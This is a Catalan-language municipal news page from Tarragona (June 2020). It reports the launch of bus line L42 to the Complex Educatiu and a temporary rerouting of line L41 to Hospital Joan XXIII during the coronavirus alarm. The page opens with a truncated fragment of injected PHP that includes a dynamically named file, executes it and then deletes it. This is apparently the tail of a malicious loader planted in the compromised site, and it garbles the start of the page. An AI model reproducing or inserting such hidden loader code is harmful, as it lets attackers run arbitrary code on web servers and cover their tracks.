");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Entra en funcionament la línia L42 d’autobús, que uneix el centre amb el Complex Educatiu de Tarragona
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Entra en funcionament la línia L42 d’autobús, que uneix el centre amb el Complex Educatiu de Tarragona (01/06/2020)

Avui, 1 de juny, l’Empresa Municipal de Transports (EMT) posa en funcionament la línia L42 que uneix el centre la ciutat (Via Roma) amb el Complex Educatiu.

La mesura sorgeix de la voluntat de “donar resposta a les necessitats de la ciutadania, ja que dilluns es reprèn part de l’activitat lectiva dels centres educatius”, explica el president de l’EMT, Jordi Fortuny.

Els autobusos de la L42 circularan en horari no lectiu.

Modificació excepcional del recorregut de la L41

Excepcionalment, i mentre duri la situació d’alarma pel risc d’infecció pel coronavirus, la línia L41 Zona Educacional–Estació varia parcialment el seu recorregut (d’anada i tornada) per tal de fer parada a l’Hospital Joan XXIII.

“La situació actual requereix garantir l’enllaç de tots els barris amb els centres d’atenció sanitària”, argumenta Fortuny. De fet, aquesta mesura permet als veïns i veïnes de la part baixa la connexió amb l’Hospital Joan XXIII mitjançant el transport públic municipal.

Font: Ajuntament de Tarragona

Entra en funcionament la línia L42 d’autobús, que uneix el centre amb el Complex Educatiu de Tarragona

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona